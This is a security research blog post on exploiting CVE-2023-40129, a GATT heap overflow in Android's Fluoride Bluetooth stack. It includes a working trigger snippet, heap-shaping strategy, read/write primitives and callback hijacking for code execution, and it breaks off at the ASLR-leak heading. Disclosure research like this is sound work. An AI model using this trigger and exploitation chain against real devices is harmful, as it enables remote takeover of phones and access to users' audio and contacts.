Paint it blue: Attacking the Bluetooth stack

Written by Mehdi Talbi, Etienne Helluy-Lafont - 27/10/2025 - in Exploit

Bluetooth has always been an attractive target for attackers since it is present almost everywhere (TVs, automotive chargers, connected fridges, etc.). This is especially true on mobile devices, where the Bluetooth stack runs as a privileged process with potential access to the microphone, the address book, etc.

In September and October 2023, Android published security bulletins addressing critical vulnerabilities in its Bluetooth stack (Fluoride) that could lead to remote code execution. CVE-2023-40129 is an integer underflow in the GATT protocol, which is reachable without authentication or user interaction. It was very challenging to exploit, as it causes a 64 KB heap overflow that acts like a tsunami devastating everything in its path, leading the Bluetooth process to an almost certain death.

In this blogpost, we detail how we exploited this vulnerability with both of Android's native allocators: Scudo and Jemalloc.


The Bluetooth Stack

The diagram above illustrates the Bluetooth stack. It is divided into two main parts: the Controller stack resides in the Bluetooth chip, while the Host stack is implemented by the operating system. The Host Controller Interface (HCI) enables communication between the two components. The controller mostly manages the physical and logical transports. Our exploit relies on ACL, the asynchronous transport that carries data frames. On Android, the Host stack, called Fluoride, runs as a userland daemon. After the ACL link is established, L2CAP (Logical Link Control and Adaptation Protocol) connections can be initiated to access various Bluetooth services (BNEP, HID, AVCTP, etc.), which provide well-known features such as network sharing, video streaming, etc. Each service is identified by a unique Protocol Service Multiplexer (PSM):

Service	PSM
SDP (Service Discovery Protocol)	0x0001
RFCOMM (Radio Frequency Communication)	0x0003
BNEP (Bluetooth Network Encapsulation Protocol)	0x000F
HID (Human Interface Device)	0x0011 (Control), 0x0013 (Interrupt)
AVCTP (Audio/Video Control Transport Protocol)	0x0017 (Control), 0x001B (Browsing)
AVDTP (Audio/Video Data Transport Protocol)	0x0019
GATT (Generic Attribute Protocol)	0x001F
GAP (Generic Access Profile)	0x1001, 0x1003, 0x1005, 0x1007

The code related to each service is located under the system/stack/ directory. Each service is registered via the following API:

uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
                        bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
                        uint16_t my_mtu, uint16_t required_remote_mtu,
                        uint16_t sec_level)

The sec_level parameter defines the security level for accessing the service. Most services require the connection to be authenticated and encrypted.

Very few services can be accessed without authentication - namely SDP, RFCOMM, and GATT. But even when a connection starts unauthenticated, certain operations (like writing GATT attributes) may later require it - further reducing the attack surface.

The BlueBlue framework

Building upon the L2CAP testing framework of the BlueBorne project, we developed our own framework named BlueBlue. It conveniently uses Scapy to build and parse HCI frames. The framework allows us to establish an ACL link with a peer device and to open L2CAP connections.

It also supports multiple features of the Bluetooth specification such as L2CAP fragmentation and the ERTM transmission mode. It implements all the features of the Host stack that we are using, giving us plenty of freedom to explore new ideas.

With just a few lines of code, we can establish an ACL connection, connect to an L2CAP service, send a command and receive the reply:

acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode = 'justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

The Bug

CVE-2023-40129 is a vulnerability present in the GATT server. The GATT protocol is used to expose simple key-value attributes. Keys are 16-bit handles, while values are raw data. The opcode GATT_REQ_READ_MULTI_VAR allows reading multiple attributes at once.

The request is made of the opcode GATT_REQ_READ_MULTI_VAR followed by the list of GATT handles:

The response is made of the opcode GATT_RSP_READ_MULTI_VAR followed by the length and the value of each requested attribute:
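To make the two layouts concrete, here is a minimal Python sketch that encodes a GATT_REQ_READ_MULTI_VAR request and splits a GATT_RSP_READ_MULTI_VAR response into (length, value) pairs. It assumes the opcode values of the Bluetooth Core Specification's ATT_READ_MULTIPLE_VARIABLE_REQ/RSP (0x20 and 0x21) and little-endian fields; the helper names are ours, not Fluoride's or BlueBlue's.

```python
import struct

# Assumed opcode values (ATT Read Multiple Variable Length, Core spec 5.2+).
ATT_READ_MULTIPLE_VARIABLE_REQ = 0x20
ATT_READ_MULTIPLE_VARIABLE_RSP = 0x21


def build_read_multi_var_req(handles):
    """Opcode byte followed by each 16-bit handle, little-endian."""
    return bytes([ATT_READ_MULTIPLE_VARIABLE_REQ]) + b"".join(
        struct.pack("<H", h) for h in handles
    )


def parse_read_multi_var_rsp(pdu):
    """Split a response into (length, value) tuples, in request order."""
    if not pdu or pdu[0] != ATT_READ_MULTIPLE_VARIABLE_RSP:
        raise ValueError("unexpected opcode")
    entries, pos = [], 1
    while pos + 2 <= len(pdu):
        (length,) = struct.unpack_from("<H", pdu, pos)  # 2-byte length prefix
        pos += 2
        entries.append((length, pdu[pos:pos + length]))
        pos += length
    return entries
```

Note that each value costs 2 extra bytes of length prefix in the response; that prefix is exactly what the buggy length computation below mishandles.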

The request is handled in the gatt_process_read_multi_req() function, which is responsible for retrieving the values of the requested attributes:

for (ll = 0; ll < multi_req->num_handles; ll++) {
  tGATTS_RSP* p_msg = (tGATTS_RSP*)osi_calloc(sizeof(tGATTS_RSP));
  handle = multi_req->handles[ll];
  auto it = gatt_sr_find_i_rcb_by_handle(handle);

  p_msg->attr_value.handle = handle;
  err = gatts_read_attr_value_by_handle(
    tcb, cid, it->p_db, op_code, handle, 0, p_msg->attr_value.value,
    &p_msg->attr_value.len, GATT_MAX_ATTR_LEN, sec_flag, key_size,
    trans_id);

  if (err == GATT_SUCCESS) {
    gatt_sr_process_app_rsp(tcb, it->gatt_if, trans_id, op_code,
                            GATT_SUCCESS, p_msg, sr_cmd_p);
  }
  /* either not using or done using the buffer, release it now */
  osi_free(p_msg);
}

The function gatt_sr_process_app_rsp() is called for each attribute. It forwards the retrieved attribute value (encapsulated in the p_msg variable) to the function process_read_multi_rsp(), which copies it into a newly allocated structure and then pushes it onto a queue:

static bool process_read_multi_rsp(tGATT_SR_CMD* p_cmd, tGATT_STATUS status,
                                   tGATTS_RSP* p_msg, uint16_t mtu)
{

  if (p_cmd->multi_rsp_q == NULL)
    p_cmd->multi_rsp_q = fixed_queue_new(SIZE_MAX);

  /* Enqueue the response */
  BT_HDR* p_buf = (BT_HDR*)osi_malloc(sizeof(tGATTS_RSP));
  memcpy((void*)p_buf, (const void*)p_msg, sizeof(tGATTS_RSP));
  fixed_queue_enqueue(p_cmd->multi_rsp_q, p_buf);

  p_cmd->status = status;
  if (status == GATT_SUCCESS) {
    /* Wait till we get all the responses */
    if (fixed_queue_length(p_cmd->multi_rsp_q) ==
        p_cmd->multi_req.num_handles) {
      build_read_multi_rsp(p_cmd, mtu);
      return (true);
    }
  } else /* any handle read exception occurs, return error */
  {
    return (true);
  }

  /* If here, still waiting */
  return (false);
}

The vulnerability is present in the function build_read_multi_rsp(), which is responsible for building the response message:

static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
  uint16_t ii, total_len, len;
  uint8_t* p;
  bool is_overflow = false;

  len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;                        // [0]
  BT_HDR* p_buf = (BT_HDR*)osi_calloc(len);
  p_buf->offset = L2CAP_MIN_OFFSET;
  p = (uint8_t*)(p_buf + 1) + p_buf->offset;

  /* First byte in the response is the opcode */
  if (p_cmd->multi_req.variable_len)
    *p++ = GATT_RSP_READ_MULTI_VAR;
  else
    *p++ = GATT_RSP_READ_MULTI;

  p_buf->len = 1;

  /* Now walk through the buffers putting the data into the response in order
   */
  list_t* list = NULL;
  const list_node_t* node = NULL;
  if (!fixed_queue_is_empty(p_cmd->multi_rsp_q))
    list = fixed_queue_get_list(p_cmd->multi_rsp_q);
  for (ii = 0; ii < p_cmd->multi_req.num_handles; ii++) {
    tGATTS_RSP* p_rsp = NULL;

    if (list != NULL) {
      if (ii == 0)
        node = list_begin(list);
      else
        node = list_next(node);
      if (node != list_end(list)) p_rsp = (tGATTS_RSP*)list_node(node); // [1]
    }

    if (p_rsp != NULL) {
      total_len = (p_buf->len + p_rsp->attr_value.len);                 // [2.1]
      if (p_cmd->multi_req.variable_len) {
        total_len += 2;                                                 // [2.2]
      }

      if (total_len > mtu) {
        /* just send the partial response for the overflow case */
        len = p_rsp->attr_value.len - (total_len - mtu);                // [3]
        is_overflow = true;
        VLOG(1) << StringPrintf(
            "multi read overflow available len=%d val_len=%d", len,
            p_rsp->attr_value.len);
      } else {
        len = p_rsp->attr_value.len;
      }

      if (p_cmd->multi_req.variable_len) {
        UINT16_TO_STREAM(p, len);
        p_buf->len += 2;
      }

      if (p_rsp->attr_value.handle == p_cmd->multi_req.handles[ii]) {
        memcpy(p, p_rsp->attr_value.value, len);                        // [4]
        if (!is_overflow) p += len;
        p_buf->len += len;
      } else {
        p_cmd->status = GATT_NOT_FOUND;
        break;
      }

      if (is_overflow) break;

    } else {
      // [...]
    }
  } /* loop through all handles*/
  // [...]
}

At the top of the function [0] we can see an allocation of the structure (p_buf) that holds the response buffer. The size of the allocated buffer depends on the MTU, which can be configured while opening the L2CAP channel.

The next portion of code iterates over the list of GATT attributes [1] and checks whether each one fits in the reply message. That is, for each attribute, the function computes the expected total length of the message ([2.1] and [2.2]) and checks whether it exceeds the MTU. If there is not enough room to store the attribute, the maximum size of the data that can be copied into the buffer is computed as shown in [3]. However, this computation is flawed because of the addition in [2.2]: the 2 bytes reserved for the length prefix make total_len - mtu larger than attr_value.len whenever fewer than 2 bytes remain in the buffer, so the subtraction in [3] underflows. This integer underflow leads to a heap-based overflow in [4] (as ironically predicted by the statement is_overflow = true).
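Writing $\ell$ for p_buf->len before the current attribute, $a$ for attr_value.len and $m$ for the MTU, the length computed at [3] in the variable-length case simplifies as follows (our own derivation from the code above; the result is stored in the 16-bit variable len, hence the reduction modulo $2^{16}$):

```latex
\begin{aligned}
t &= \ell + a + 2 \qquad \text{(total\_len, [2.1] + [2.2])} \\
\texttt{len} &= a - (t - m) = m - \ell - 2 \pmod{2^{16}} \qquad (t > m) \\
\ell = m - 1 &\;\Rightarrow\; \texttt{len} = -1 \equiv \texttt{0xffff}, \qquad
\ell = m \;\Rightarrow\; \texttt{len} = -2 \equiv \texttt{0xfffe}
\end{aligned}
```

Since earlier iterations only accept attributes with $t \le m$, $\ell$ never exceeds $m$, so the bad case yields a copy length of 0xffff or 0xfffe bytes.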

The following snippet of code triggers the vulnerability. It connects to the GATT channel with an MTU of 55, then requests attribute 9 (a 16-byte value) four times:

acl = ACLConnection(interface, bdaddr)

gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)

pkt = b'\x20'   # GATT_REQ_READ_MULTI_VAR OPCODE 
pkt += p16(9)   # 16-byte attr
pkt += p16(9)   # 16-byte attr
pkt += p16(9)   # 16-byte attr
pkt += p16(9)   # 16-byte attr

gatt.send(pkt)

The overflow occurs while trying to insert the last attribute. More precisely, at [3], p_buf->len has a value of 55 (1 + 3*(16+2)) and total_len is 73. Therefore, len underflows to -2 (0xfffe), causing an overflow of about 64 KB in the response buffer.
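The numbers above can be replayed with a small Python model of the length bookkeeping in build_read_multi_rsp() for the variable-length case. This is a sketch, not Fluoride code: it only mirrors steps [2.1], [2.2] and [3], applying 16-bit wraparound as the uint16_t variables do in C, and returns the memcpy length chosen for each attribute.

```python
U16 = 0xFFFF


def multi_var_copy_lengths(attr_lens, mtu):
    """Model of build_read_multi_rsp() length logic (variable_len case).

    Returns the number of bytes memcpy'd for each attribute at [4].
    """
    buf_len = 1                                       # opcode byte
    copies = []
    for attr_len in attr_lens:
        total_len = (buf_len + attr_len + 2) & U16    # [2.1] + [2.2]
        if total_len > mtu:
            n = (attr_len - (total_len - mtu)) & U16  # [3], may wrap around
            copies.append(n)
            break                                     # is_overflow
        copies.append(attr_len)
        buf_len += 2 + attr_len                       # prefix + value
    return copies


# Four 16-byte attributes with an MTU of 55, as in the trigger above.
lengths = multi_var_copy_lengths([16] * 4, 55)
```

With an MTU of 54, the same request ends with a legitimate partial copy of 15 bytes, which shows that the bug only fires when fewer than 2 bytes are left. Note that the wrapped length also drives the read side of the memcpy, so roughly 64 KB are read past the attribute value; this is why the exploit later shapes the memory that follows the source buffer.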

Recently, at OffensiveCon 2025, the Android Red Team at Google, who discovered the bug, presented a PoC exploit targeting a sibling vulnerability (CVE-2023-35673) on Pixel devices. However, their exploit assumes that ASLR is disabled and that the attacker is already paired with the target device. In the next sections, we detail our strategy to exploit Fluoride without relying on those assumptions.

Just Works, Still Works

In 2017, the BlueBorne whitepaper disclosed several critical Bluetooth vulnerabilities affecting both BlueZ (Linux stack) and Fluoride (Android stack). The paper describes an "obscure" authentication method of the Bluetooth specification: Just Works. The Just Works authentication mode allows temporary pairing without user interaction. It is used when performing Secure Simple Pairing (SSP) with devices that have no keyboard or display. In this scenario, authentication occurs without PIN validation.

We implemented the Just Works authentication mode in the BlueBlue framework and confirmed that it is still working on Android 13.

Just Works authentication comes with some limitations. First, Fluoride treats the connection as vulnerable to MITM attacks, which prevents access to certain features like reading or writing protected GATT attributes. Second, using Just Works breaks any existing pairing with a device that shares the same BDADDR. Despite its limitations, this authentication mode still lets us establish an L2CAP connection to various Bluetooth services such as GAP, BNEP, and AVCTP. Even though the vulnerability does not require prior authentication to be triggered, the way we exploit it requires connecting to multiple L2CAP channels. That is where the Just Works mode comes into play.

Exploitation Primitives

Persistent Data Allocation

The exploitation of this bug requires a fine-grained shaping strategy in order to prevent the Bluetooth daemon from crashing due to a corrupted heap state.

We audited the Fluoride source code and identified features that can be abused to force allocations of controlled size with controlled data, and to make those allocations persistent. For instance, while configuring an L2CAP channel, if the peer device does not recognize a configuration option, it sends back an exact copy of the rejected options in a CONFIG REJ message. A configuration option is made of a type (1-byte field), a length (1-byte field) and a variable-length value whose content is fully controlled. The allocation of the response holding the rejected options is made in the following function:

void l2cu_send_peer_config_rej(tL2C_CCB* p_ccb, uint8_t* p_data,
                               uint16_t data_len, uint16_t rej_len) {
    uint16_t len, cfg_len, buf_space, len1;
    uint8_t *p, *p_hci_len, *p_data_end;
    uint8_t cfg_code;

    /* ... */

    len = BT_HDR_SIZE + HCI_DATA_PREAMBLE_SIZE + L2CAP_PKT_OVERHEAD +
          L2CAP_CMD_OVERHEAD + L2CAP_CONFIG_RSP_LEN;

    BT_HDR* p_buf = (BT_HDR*)osi_malloc(len + rej_len);

    /* ... */
}

The allocation is freed as soon as it is sent back to the peer initiating the connection. However, we can make it persistent thanks to congestion.
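The relation between the rejected options and the size of the CONFIG REJ allocation can be sketched in Python. The header constants below are our reading of Fluoride's headers and should be treated as assumptions to check against the targeted tree; the option type 0x42 is a hypothetical unrecognized type chosen for illustration.

```python
import struct

# Assumed values of the constants used in l2cu_send_peer_config_rej().
BT_HDR_SIZE = 8
HCI_DATA_PREAMBLE_SIZE = 4
L2CAP_PKT_OVERHEAD = 4
L2CAP_CMD_OVERHEAD = 4
L2CAP_CONFIG_RSP_LEN = 6


def config_option(opt_type, value):
    """Encode one L2CAP configuration option: type (1 byte), length (1 byte), value."""
    if len(value) > 0xFF:
        raise ValueError("the 1-byte length field limits a value to 255 bytes")
    return struct.pack("<BB", opt_type, len(value)) + value


def config_rej_alloc_size(rej_len):
    """Size passed to osi_malloc() for a CONFIG REJ echoing rej_len bytes."""
    return (BT_HDR_SIZE + HCI_DATA_PREAMBLE_SIZE + L2CAP_PKT_OVERHEAD
            + L2CAP_CMD_OVERHEAD + L2CAP_CONFIG_RSP_LEN + rej_len)


# A hypothetical unknown option whose echo would land in a 96-byte allocation.
opt = config_option(0x42, b"A" * 68)
```

Under these assumptions, the fixed overhead is 26 bytes, so the attacker picks the echoed length to reach the desired allocation size byte for byte.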

Congestion

The Bluetooth specification provides a flow control feature at the ACL layer. When its ACL RX buffer is full, a Bluetooth controller can clear the FLOW bit in the header of the ACL packets it sends, to stop the peer from sending more packets while the RX buffer gets processed. This functionality is normally not exposed to the host, but it could be manipulated by modifying the controller's firmware. Luckily for us, Cypress controllers even feature a proprietary HCI command to toggle it, so simulating an ACL congestion was actually quite simple. In this state, our device (declared as congested) can still send packets to the target but cannot receive the replies: the target processes these packets but is unable to respond. The Fluoride stack handles congestion gracefully. So if we send invalid configuration requests while our controller declares an ACL congestion, Fluoride does not send back the replies, but keeps them in a queue until the congestion ends.

It should be noted that congestion is limited by a quota. Once the quota is reached, additional messages are dropped instead of being enqueued. However, L2CAP signalling channels are not subject to this limitation which means that we can allocate a virtually unlimited number of CONFIG REJ response messages. We can free all those allocations by closing the related ACL connection.

It is also worth noting that congestion takes effect with a delay in the Fluoride stack: the first batch of responses is freed as soon as it is sent to the controller. The following function checks whether a packet can be sent to the controller:

void l2c_link_check_send_pkts(tL2C_LCB* p_lcb, uint16_t local_cid,
                              BT_HDR* p_buf) {
    /* ... */
    while(((l2cb.controller_xmit_window != 0 &&
        (p_lcb->transport == BT_TRANSPORT_BR_EDR)) ||
        (l2cb.controller_le_xmit_window != 0 &&
        (p_lcb->transport == BT_TRANSPORT_LE))) &&
        (p_lcb->sent_not_acked < p_lcb->link_xmit_quota)) {
            p_buf = l2cu_get_next_buffer_to_send(p_lcb);
            if (p_buf == NULL) {
                LOG_DEBUG("No next buffer, skipping");
                break;
            }
            LOG_DEBUG("Sending to lower layer");
            l2c_link_send_to_lower(p_lcb, p_buf);
        }
    }
    /* ... */
}

The check is based on the controller_xmit_window variable, which is decremented whenever a packet is transmitted to the underlying controller in the function l2c_link_send_to_lower_br_edr(). Its value is incremented in l2c_packets_completed() by the number of acknowledged packets.
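The effect of this window on persistence can be illustrated with a toy Python model. It is not Fluoride code: the names only mirror the C variables, and it ignores link_xmit_quota and the LE transport. Packets handed to the controller leave the host queue (and are freed), while everything sent after the window reaches zero stays allocated until completions arrive.

```python
from collections import deque


class XmitWindowModel:
    """Toy model of controller_xmit_window bookkeeping (BR/EDR only)."""

    def __init__(self, window):
        self.controller_xmit_window = window
        self.queue = deque()   # responses still held (allocated) by the host
        self.sent = []         # handed to the controller, freed by the host

    def enqueue(self, pkt):
        self.queue.append(pkt)
        self.check_send_pkts()

    def check_send_pkts(self):
        # Same loop condition as l2c_link_check_send_pkts(), minus the quota.
        while self.controller_xmit_window != 0 and self.queue:
            self.sent.append(self.queue.popleft())
            self.controller_xmit_window -= 1   # l2c_link_send_to_lower_br_edr()

    def packets_completed(self, n):
        self.controller_xmit_window += n       # l2c_packets_completed()
        self.check_send_pkts()


m = XmitWindowModel(window=3)
for i in range(10):
    m.enqueue(i)   # the first 3 responses go out (and are freed), 7 stay queued
```

This is why the spray starts with a batch of sacrificial CONFIG REJ messages: they consume the controller window, and only the later ones remain persistent while the congestion lasts.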

ERTM Transmission Mode

ERTM (Enhanced Retransmission Mode) is an L2CAP transmission mode that adds reliability on top of L2CAP: sequence numbering, acknowledgement, and retransmission. We can abuse this mode in two different ways to force persistent allocations:

Send an L2CAP fragment with an unexpected sequence number, e.g., seq_tx = 1. As long as the message with sequence number seq_tx = 0 has not been sent, the remote peer retains all subsequent messages in memory. This behavior is useful as it allows us to allocate messages with controlled size and controlled data.
Force Fluoride to send an ERTM fragment, but intentionally do not acknowledge it. The fragment stays in memory, and we can request its retransmission at any time as long as we do not acknowledge it.

Each of these two techniques allows the allocation of up to 10 persistent messages per L2CAP connection (this is why we could not rely on ERTM for spraying). Only a limited number of L2CAP channels such as GAP and AVCTP support ERTM mode and all of them require authentication with the peer device.
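The first technique can be pictured with a toy ERTM receiver in Python. This is a simplified model, not Fluoride's implementation: it assumes 6-bit sequence numbers and a receive window of 10 (the window size is an assumed parameter). Frames that arrive after a gap are buffered, and nothing is released until the missing sequence number shows up.

```python
class ErtmRxModel:
    """Toy ERTM receiver: out-of-order frames are held until the gap is filled."""

    TX_WINDOW = 10      # assumed window size
    SEQ_MODULO = 64     # 6-bit TxSeq (standard control field)

    def __init__(self):
        self.expected = 0
        self.held = {}        # seq -> payload: these stay allocated
        self.delivered = []

    def receive(self, seq, payload):
        # Frames outside [expected, expected + TX_WINDOW) are rejected.
        if (seq - self.expected) % self.SEQ_MODULO >= self.TX_WINDOW:
            return False
        self.held[seq] = payload
        # Release frames only once they are contiguous with what was delivered.
        while self.expected in self.held:
            self.delivered.append(self.held.pop(self.expected))
            self.expected = (self.expected + 1) % self.SEQ_MODULO
        return True


rx = ErtmRxModel()
for seq in range(1, 6):      # never send seq 0
    rx.receive(seq, bytes(seq))
```

After this loop, five payloads of attacker-chosen size sit in memory; sending seq 0 (or closing the channel) releases them all at once, which matches the "free the ERTM allocations" step used later for heap shaping.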

Relative Read Primitive

The BT_HDR structure is an interesting target. It is heavily used in the Bluetooth codebase to represent various data such as L2CAP messages and ERTM fragments:

    typedef struct {
      uint16_t event;
      uint16_t len;
      uint16_t offset;
      uint16_t layer_specific;
      uint8_t data[];
    } BT_HDR;

The BT_HDR structure has a variable length. The len field holds the length of the data, and the offset field indicates where the data starts within the data array. To build a relative read primitive in the heap, we can rewrite the len field of an ERTM fragment pending in the sending queue and enlarge it in order to leak heap contents of the com.android.bluetooth process.
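The read primitive can be modeled in Python on a toy heap (a bytearray), assuming the little-endian layout of the structure shown above. The sender trusts len and offset, so enlarging len makes the emitted payload extend into whatever follows the chunk. The helper name and the heap contents are illustrative only.

```python
import struct

# BT_HDR as shown above: four little-endian uint16 fields, then data[].
BT_HDR_FMT = "<HHHH"                       # event, len, offset, layer_specific
BT_HDR_SIZE = struct.calcsize(BT_HDR_FMT)  # 8 bytes


def bt_hdr_payload(heap, addr):
    """Bytes a sender would emit for the BT_HDR at heap[addr]:
    data[offset : offset + len]. Nothing ties len to the chunk size."""
    _event, length, offset, _ls = struct.unpack_from(BT_HDR_FMT, heap, addr)
    start = addr + BT_HDR_SIZE + offset
    return bytes(heap[start:start + length])


# Toy heap: a 16-byte chunk holding a BT_HDR with 4 data bytes,
# followed by a neighbouring chunk with "secret" content.
heap = bytearray(64)
struct.pack_into(BT_HDR_FMT, heap, 0, 0, 4, 0, 0)
heap[8:12] = b"ABCD"
heap[16:22] = b"SECRET"

struct.pack_into("<H", heap, 2, 14)  # corrupt len (offset 2 in BT_HDR)
leak = bt_hdr_payload(heap, 0)       # now spans into the neighbour
```

In the real exploit, the "send" is the retransmission of the pending ERTM fragment, and the corrupted len comes from the overflow rather than a direct write.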

The AVCTP browsing channel is a good candidate to build the reading primitive. It uses ERTM and we can force it to transmit a reply of controlled size. The request GET_FOLDER_ITEMS lets us request the metadata of a music playlist (e.g. artist, song name, album name). By sending a GET_FOLDER_ITEMS request with carefully selected attributes, we can make the allocation of the reply fall within the same bin class as the vulnerable buffer. If we alter the BT_HDR structure related to the GET_FOLDER_ITEMS response, we can get a leak by requesting a retransmission of the altered message.

Relative Write Primitive

ERTM supports fragmentation. Messages are reassembled in the do_sar_reassembly() function. Upon receiving the first fragment, the function allocates a BT_HDR structure using the SDU length specified in that fragment:

if (sar_type == L2CAP_FCR_START_SDU) {
  /* Get the SDU length */
  STREAM_TO_UINT16(p_fcrb->rx_sdu_len, p);
  p_buf->offset += 2;
  p_buf->len -= 2;

  if (p_fcrb->rx_sdu_len > p_ccb->max_rx_mtu) {
    L2CAP_TRACE_WARNING("SAR - SDU len: %u  larger than MTU: %u",
                        p_fcrb->rx_sdu_len, p_ccb->max_rx_mtu);
    packet_ok = false;
  } else {
    p_fcrb->p_rx_sdu = (BT_HDR*)osi_malloc(
        BT_HDR_SIZE + OBX_BUF_MIN_OFFSET + p_fcrb->rx_sdu_len);
    p_fcrb->p_rx_sdu->offset = OBX_BUF_MIN_OFFSET;
    p_fcrb->p_rx_sdu->len = 0;
  }
}

Subsequent fragments are copied using len and offset fields of BT_HDR structure:

memcpy(((uint8_t*)(p_fcrb->p_rx_sdu + 1)) + p_fcrb->p_rx_sdu->offset +
       p_fcrb->p_rx_sdu->len, p, p_buf->len);

p_fcrb->p_rx_sdu->len += p_buf->len;

So by corrupting the offset field, then sending a second fragment with some data, we obtain a relative write primitive.
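The write side can be modeled the same way. This Python sketch mimics the reassembly memcpy shown above on a toy heap: the fragment is copied to data + offset + len and len is then increased. For simplicity, the model starts with offset 0 instead of OBX_BUF_MIN_OFFSET; the function name is ours.

```python
import struct

BT_HDR_FMT = "<HHHH"   # event, len, offset, layer_specific
BT_HDR_SIZE = 8


def append_fragment(heap, sdu_addr, fragment):
    """Mimic the reassembly memcpy: copy the fragment to
    data + offset + len, then grow len. offset is trusted as-is."""
    event, length, offset, ls = struct.unpack_from(BT_HDR_FMT, heap, sdu_addr)
    dst = sdu_addr + BT_HDR_SIZE + offset + length
    if dst + len(fragment) > len(heap):
        raise IndexError("write past the end of the toy heap")
    heap[dst:dst + len(fragment)] = fragment
    struct.pack_into(BT_HDR_FMT, heap, sdu_addr,
                     event, length + len(fragment), offset, ls)


heap = bytearray(128)
struct.pack_into(BT_HDR_FMT, heap, 0, 0, 0, 0, 0)   # freshly allocated SDU
append_fragment(heap, 0, b"hi")                     # normal reassembly
struct.pack_into("<H", heap, 4, 100)                # corrupt offset (field at +4)
append_fragment(heap, 0, b"PWN")                    # lands 100 bytes further
```

The destination is relative to the corrupted structure, which is why this primitive only helps when the target object sits at a predictable distance from it.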

ASLR bypass & PC Control

The Fluoride stack uses libchrome callback objects to handle various events. These objects are interesting for building exploitation primitives since they hold a function pointer that is called when the callback fires, along with some of the arguments passed to it. Therefore, leaking such an object would reveal the libbluetooth base address, and rewriting it would give us control over the flow of execution.

The SDP Discovery Callback is of particular interest since we control its allocation and we can trigger the callback at any time:

The callback object is allocated in the SdpLookup() function while opening an AVRCP channel:

bool ConnectionHandler::SdpLookup(const RawAddress& bdaddr, SdpCallback cb,
                                  bool retry) {

/* ... */

return avrc_->FindService(UUID_SERVCLASS_AV_REMOTE_CONTROL, bdaddr,
                            &db_params,
                            base::Bind(&ConnectionHandler::SdpCb,
                                       weak_ptr_factory_.GetWeakPtr(), bdaddr,
                                       cb, disc_db, retry)) == AVRC_SUCCESS;
}

The Bind method is responsible for allocating the callback object (0x60 bytes). The callback structure is filled with the SdpCb function pointer along with its parameters:

void ConnectionHandler::SdpCb(RawAddress bdaddr, SdpCallback cb,
                              tSDP_DISCOVERY_DB* disc_db, bool retry,
                              uint16_t status)

The callback is called in the function avrc_sdp_cback():

/******************************************************************************
 *
 * Function         avrc_sdp_cback
 *
 * Description      This is the SDP callback function used by A2DP_FindService.
 *                  This function will be executed by SDP when the service
 *                  search is completed.  If the search is successful, it
 *                  finds the first record in the database that matches the
 *                  UUID of the search.  Then retrieves various parameters
 *                  from the record.  When it is finished it calls the
 *                  application callback function.
 *
 * Returns          Nothing.
 *
 *****************************************************************************/
static void avrc_sdp_cback(tSDP_STATUS status) {
    AVRC_TRACE_API("%s status: %d", __func__, status);

    /* reset service_uuid, so can start another find service */
    avrc_cb.service_uuid = 0;

    /* return info from sdp record in app callback function */
    avrc_cb.find_cback.Run(status);

    return;
}

Overwriting the callback object allows triggering an arbitrary function call with fully controlled arguments. We can trigger the callback by disconnecting from the SDP channel that is established by the remote device while connecting to the AVRCP browsing channel.

Code execution on Jemalloc devices

Exploitation scenario

In order to get code execution on devices using Jemalloc, we adopted the following strategy:

Shape the heap in order to overlap two BT_HDR objects. The first refers to an ERTM message pending in the transmission queue (reader), while the second corresponds to an ERTM fragment pending in the reception queue (writer).
Trigger overflow and corrupt both reader and writer objects.
Allocate callback object (executor).
Request the retransmission of the altered packet.
Retrieve the content of the callback object.
Rewrite the content of the callback object using the relative write primitive.
Trigger the callback.

Heap shaping

The first step is to shape the heap in order to overlap the reader and writer objects with controlled data. We rely on the features described in the previous section, such as congestion and the ERTM transmission mode. More precisely, we adopted the following strategy in order to control the source of the overflow as well as to arrange the objects in the destination bin.

Enable ACL congestion.
Spray multiple CONFIG REJ messages.
Interleave ERTM messages allocations during the spray by starting the sequence with seq_tx > 0. ERTM allocations are used to create "holes" in the heap.
Disable ACL congestion. CONFIG REJ allocations are freed.
Free the ERTM allocations, for instance by closing the connection. The freed ERTM slots are reused by the GATT-related objects during the overflow.

The following figure illustrates the heap state used to control the source of the overflow. First, we spray a dozen CONFIG REJ messages in order to make the congestion effective at the Bluetooth stack level. Then, we alternate allocations of ERTM messages and CONFIG REJ messages so that every ERTM message is followed by controlled data. Once freed, the ERTM allocations will be reused by GATT objects (tGATTS_RSP) holding the attribute values that will be copied into the vulnerable object.

Now that we have the desired heap state to control the source of the overflow, let us see how we can arrange the objects (reader, writer and executor) in the same bin as the vulnerable object. For reference, the size of the vulnerable object depends on the MTU size and is computed as follows:

len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu; // 8 + 13 + MTU

We decided to target the same bin used in the allocation of the callback object (executor). By applying the same strategy used to shape the source, we obtained the desired heap state. In the figure shown below, the executor object is allocated after the overflow.
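Choosing the MTU then boils down to a size-class lookup. The Python sketch below assumes the usual jemalloc small size classes on a 64-bit target (8, then 16-byte steps up to 128, then four classes per power of two); the actual classes of the targeted Android build should be checked. It lists the MTUs for which the vulnerable buffer (8 + 13 + MTU bytes) shares the 0x60-byte class of the callback object.

```python
def jemalloc_size_class(n):
    """Round a request up to an assumed jemalloc small size class (64-bit):
    8, 16, 32, 48, ..., 128, then 160, 192, 224, 256, 320, ..."""
    if n <= 8:
        return 8
    if n <= 128:
        return (n + 15) & ~15                      # 16-byte spacing
    step = (1 << (n - 1).bit_length()) // 8        # 4 classes per doubling
    return (n + step - 1) // step * step


def vuln_alloc_size(mtu):
    return 8 + 13 + mtu   # sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu


def mtus_in_class(target, mtus=range(23, 1024)):
    """MTU values whose vulnerable allocation falls in the target class."""
    return [m for m in mtus if jemalloc_size_class(vuln_alloc_size(m)) == target]


candidates = mtus_in_class(0x60)   # same class as the 0x60-byte callback
```

Under these assumptions, the MTU of 55 used in the trigger lands in the 80-byte class, so reaching the callback's class requires a slightly larger MTU.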

Leaking the ASLR

